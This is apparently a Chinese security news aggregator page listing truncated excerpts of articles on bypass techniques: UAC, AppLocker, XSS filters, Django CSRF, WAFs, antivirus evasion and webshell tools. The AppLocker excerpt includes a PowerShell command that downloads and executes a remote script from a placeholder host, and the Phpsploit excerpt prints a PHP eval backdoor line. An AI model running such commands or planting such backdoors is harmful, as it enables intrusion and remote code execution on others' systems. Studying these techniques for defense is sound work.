记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

利用metasploit绕过UAC的5种方式

大家好,今天,我们将浅析用户帐户控制(简称UAC)。我们还将了解它如何保护你免受恶意软件的入侵,如若忽略UAC提示,可能会对你的系统造成不良影响。目录· UAC简介· UAC是什么· UAC工作原理5种绕过UAC的方法1.Windows升级UAC保护绕过2.Windows升级UAC保护绕过(内存注入绕过)3.Windows UAC保护绕过(FodHelper注册表键值绕过)4.Windows升级UAC保护绕过(Eventvwr注册表键值绕过)5.Windows升级UAC保护绕过(COM Handler劫持绕过)用户账户控制(UAC)介绍什么是用户账户控制?在Microsoft Windows Vis
发布时间:2018-11-09 12:20 | 阅读:73809 | 评论:0 | 标签:系统安全 bypass UAC

使用XML Internal Entities绕过chrome和IE的Xss过滤

Web 应用程序在后端执行XML处理是很容易受到XSS攻击,可以使用XML内部实体绕过WE浏览器(如:chrome、IE、safari)的XSS浏览器。 绕过常用浏览器的 XSS 过滤器 Oracle的eBusiness Suite 12.x和更早版本中的BneApplicationService servlet有跨站点脚本漏洞, 这是寻找XML外部实体注入漏洞时发现的。 如果我们请求以下URL:https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=Bne MsgBox&bne:messagexml=XXX将会得到如下的响应: The following error has oc
发布时间:2016-10-21 22:50 | 阅读:110475 | 评论:0 | 标签:Web安全 bypass XML XXE xss

Django CSRF 防护绕过漏洞分析

0x01 Django CSRF Bypass 原始漏洞链接 https://hackerone.com/reports/26647 0x02 使用 Google Analytics 进行 Cookie 注入 Google Analytics 会设置这样的 Cookie 来追踪用户访问__utmz=123456.123456789.11.2.utmcsr=[HOST]|utmccn=(referral)|utmcmd=referral|utmcct=[PATH]比如__utmz=123456.123456789.11.2.utmcsr=blackfan.ru|utmccn=(referral)|utmcmd=referral|utmcct=/path/用户可以完全控制 referer 中的 path,然后在放入
发布时间:2016-10-14 22:30 | 阅读:131518 | 评论:0 | 标签:Web安全 bypass cookie注入 csrf Django 漏洞分析 CSRF 漏洞

AppLocker Bypass Techniques

from:https://www.youtube.com/watch?v=z04NXAkhI4k 0x00 Command 和 Powershell 没被禁用,脚本被禁用 1、直接使用cmd powershell执行 Powershell: IEX (New-Object Net.WebClient).DownloadString('http://ip:port/') Command: powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/') 2、管道 Powershell:Get-Content script.ps1 | iexCommand:cmd.exe /K &
发布时间:2016-09-20 21:35 | 阅读:131501 | 评论:0 | 标签:系统安全 applocker bypass powershell windows

动手打造Bypass UAC自动化测试小工具,可绕过最新版Win10

* 本文原创作者:ExpLife,本文属FreeBuf原创奖励计划,未经许可禁止转载 前言关于UAC的机制在笔者之前的<<聊聊BypassUAC的那些事儿>>一文中已经做了详尽的介绍。最初绕过UAC的方法最初绕过的UAC的方法揭露是http://www.pretentiousname.com/misc/win7_uac_whitelist2.html,,其原理可以归结为下图: 由dll劫持绕过UAC演化出来的各种各样的变形以下文件都位于windows系统目录%systemroot%以及其相应子目录下: 释放这些黑dll到系统目录下也由原来的利用autoelevate的COM接口IfileOperation变为了利用wusa命令将黑d
发布时间:2016-09-20 20:30 | 阅读:131872 | 评论:0 | 标签:工具 系统安全 bypass UAC Win10

Xen SMEP (and SMAP) bypass

介绍 在先前的博客文章1里,我讨论了我探索Xen的SYSRET bug的流程。我有提到,我能够绕过SMEP,但是我并没有说具体的细节,因为我想做一些深入的研究–我觉得我在Xen使用的绕过SMEP的方法在linux下也适用。 当时我还不知道,这个技术在2014年中旬就已经被发表出来了,叫做”ret2dir”(return-to-direct-mapped-memory)。这个技术已经被公开了,我接下来要说的就是关于”如何利用Xen的direct mapped memory(直接映射内存)来绕过SMEP和SMAP机制”,以及“如何使用我的exploit绕过SMEP并且简化dom0-domU的数据隧道“。 据我所知,目前还没有公开讨论的利用ret2dir在Xen上进行exploit的文章。 SMEP 和 SMAP 简
发布时间:2016-08-22 16:55 | 阅读:251514 | 评论:0 | 标签:逆向破解 bypass Payload SMAP SMAP绕过 SMEP SMEP绕过 Xen

浅析WAF下的SQLi防御绕过

0x00 几个月前在一个SRC的一个夺旗赛看了一下,题目里遇到了他们用自己的云waf保护起来的靶机,不禁心里为出题人鼓掌。直接对靶机奉上绕过策略当然有点蠢萌,不过作为探索研究决定继续往下看了看,当时运气不错,一顿测试后还真的找到了一个sql injection的bypass方法过了那题,觉得这个简单的绕过策略他们应该能抓到,等补了再写博客。 结果。。。这两天聊到云waf想起这件事来。去主站看了一下,发现和上次测试区别是防御规则加上了web客户端指纹,发现恶意以后直接长时间屏蔽掉来自这个web客户端的请求。然而上次用的方法并没有被补上,本来想把payload作为绕过实例的,现在只好略过这个具体方法写思路了。正巧前段时间看到锁师兄在ali峰会上讲的waf防御的非主流技术,那记录一下测试思路和友情吹一波锁师兄。 0x
发布时间:2016-08-19 11:20 | 阅读:104544 | 评论:0 | 标签:Web安全 bypass sql injection sqli waf waf绕过 防御绕过

打狗棒法之进阶篇:Cknife修改配置法秒过安全狗

0×01 男人要持久在上一篇《打狗棒法之:Cknife(C刀)自定义模式秒过安全狗》之后,今天做一回真正的男人直奔主题,但是作为一个真男人我们要坚守一个道理那就是:不能秒要持久。本文的两个例子为抛砖引玉,主要讲解使用方法以及绕狗思路。0×02 准备上一次为大家介绍了自定义模式秒过安全狗,这一次将介绍修改配置法过安全狗。修改配置文件过狗理论上讲比自定义模式更快更方便(前提是你要有好的代码基础),自定义模式是在实在没有好的思路的时候才会选用它,通过修改配置法不需要像自定义模式那样一个一个功能的添加,只需要两个绕过就可以达到正常使用所有功能的效果。0×03 科普在开始使用修改配置法过狗前要知道安全狗拦截了什么,先做一个简单科普:安全狗拦截菜刀连接的过程有两步,第一步
发布时间:2016-03-31 18:10 | 阅读:90546 | 评论:0 | 标签:WEB安全 系统安全 bypass Cknife 安全狗

如何利用十行代码,绕过杀毒软件实现免杀?

我原本打算写一篇冗长的博客讲述针对不同杀毒软件的绕过技术,但当我开始着手写教程的第一章并上传样本到 virustotal 后,我震惊了!样本得到了 0/56 的检测率。于是我决定扔掉先前的长篇大论,转而记录这个快速、令人难以置信的简单方法。我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。在我们开始接触这段小巧的 C++ 代码前,我想先介绍一个可以非常棒的制造免杀的工具 Veil-Evasion (Veil-Framework的一部分)。这个工具非常神奇 (感谢 @harmj0y和他的小伙伴们创建了这个神奇的项目),在几乎所有情况下
发布时间:2016-03-29 04:35 | 阅读:93170 | 评论:0 | 标签:系统安全 AV bypass 十行代码 杀毒软件

打狗棒法之:Cknife(C刀)自定义模式秒过安全狗(二)

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 0×00 前言亲爱的Chora小伙伴在上文说过,他是一个有责任心的基佬,要手把手为大家(不)负责任的讲解如何使用Cknife。于是他挥动着小皮鞭,给了身为小弟(弟)的我24小时速成JSP、ASP.NET。在这种极度威逼利诱之下,我不负责任的攒出了绕狗第二式,内容过于冗长,还望请各位看官耐着性子,看一个渣农是如何利用Cknife过安全狗的(没办法,Chora牛总是太快,我秒不了)。 0×01 JSP绕狗代码分析首先我们需要判断安全狗所拦截的代码是哪一部分。由于本人是Chora牛口中的“二号垃圾”(一号已经另有他人),所以采用了最笨的办法,一个函数一个函数删除来判断安全狗
发布时间:2016-03-25 23:55 | 阅读:138908 | 评论:0 | 标签:WEB安全 bypass Cknife 安全狗绕过 安全狗

XSS过滤器Bypass的一些姿势

XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。以一个网上商城应用 Magento 中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode 为例,部分代码如下:protected $_expressions = array(    '/(/*.**/)/Us',    '/(t)/', &n
发布时间:2016-02-16 00:30 | 阅读:101331 | 评论:0 | 标签:WEB安全 bypass XSS过滤器 方法 绕过 xss

HTTP逃逸原理解析:使用HTTP 0.9进行绕过

本文是HTTP逃逸系列的第一篇文章。主要是说大多数防火墙只是通过规则判断出错误的包进行阻塞,因此其实可以轻易的让防火墙无法理解的数据包绕过防火墙。本文中用到的协议是比较老但是依然在用的HTTP 0.9协议。什么是HTTP 0.9HTTP 0.9是第一个版本的HTTP协议,在1991年的时候被正式提出,实际上在更早的时候就已经一直在使用这个版本了。简单来说,它是由客户端上的GET请求和服务端的响应组成,其中,GET请求和现在用的GET请求有点类似。与HTTP 1.0中的响应包不同的是0.9版本的并不是由响应头和响应内容组成,而是只有一个响应体构成。这就意味着不可以构造特殊的数据类型(Content-type),所以响应包只是简单的以与服务器的TCP连接的断开为结束。在现在的HTTP 1.1中
发布时间:2016-01-21 14:15 | 阅读:77116 | 评论:0 | 标签:WEB安全 bypass HTTP HTTP逃逸

Phpsploit:隐蔽的Post-Exploitation框架

Phpsploit是一个远程控制框架,为客户端与服务器间提供shell交互连接。能够对Getshell的服务器进行管理实现权限提升。Phpsploit利用多形态后门通道使模糊化通信机制通过客户端请求和WEB服务端响应中的HTTP头实现:<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>特性:高效性:可使用20多款插件实现post-exploitation任务自动化  执行命令、浏览文件系统、绕过PHP安全限制;  在目标主机与客户端之间执行文件上传、下载操作;  通过本地编辑器来编辑远程主机上的文件;  在远程主机上运行数据库控制台;&
发布时间:2016-01-06 10:15 | 阅读:78270 | 评论:0 | 标签:工具 bypass Phpsploit 安全限制 框架 渗透测试 exp

waf绕过的技巧

研究过国内外的waf。分享一些 奇淫绝技。 一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。 Mysql tips1: 神奇的 `  (格式输出表的那个控制符) 过空格和一些正则。 mysql> select`version`() -> ; +----------------------+ | `version`() | +----------------------+ | 5.1.50-community-log | +----------------------+ 1 row in set (0.00 sec) 一个更好玩的技巧,这个`控制符可
发布时间:2015-11-19 09:20 | 阅读:90019 | 评论:0 | 标签:Web安全 bypass bypass waf livers mysql注释符 waf waf绕过的技巧 奇淫绝技

科普:5种小技巧干扰反病毒工程师

没有一个编写恶意软件的程序员希望一个分析师去分析他们的代码,所以他们会采用一些技巧来阻止这种行为。 Debugger和VMWare一类的虚拟化技术都被恶意软件所针对,因为如果Debugger连接到正在运行中的恶意软件的话,恶意软件可以很方便地被分析。 虽然现在在本文中要描述的内容都不算新颖,但是它们也许能够帮助在这些陷阱之中的你知道怎么一回事。 VMware的I / O端口 VMware Tools是一个软件包,用户们可以在他们的VMware虚拟机上安装,以增加其功能——比如允许主机和客户之间的拖放功能,反之亦然。他们的竞争对手Oracle Virtualbox也为他们的虚拟机提供了一个类似的安装包,称之为Virtualbox客户添置。 VMware Tools采用了一种特殊的I / O端口来进行主机和虚拟
发布时间:2014-10-11 00:20 | 阅读:87689 | 评论:0 | 标签:逆向工程 bypass

Bash 3.0-4.3命令执行漏洞补丁Bypass漏洞分析

白天忙着漏洞响应、服务器测试和修复、漏洞影响范围统计等事,直到晚上终于有时间来分析了。官方提供的第一个补丁主要修改了:1、参数类型和个数的限制,从注释中即可看出:#define SEVAL_FUNCDEF 0x080 /* only allow function definitions */ #define SEVAL_ONECMD 0x100 /* only allow a single command */ 2、给builtins/evalstring.c文件里的parse_and_execute加入了类型判断: if ((flags & SEVAL_FUNCDEF) && command->type != cm_function_def) {
发布时间:2014-09-27 20:35 | 阅读:58954 | 评论:0 | 标签:bash 漏洞 bypass

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云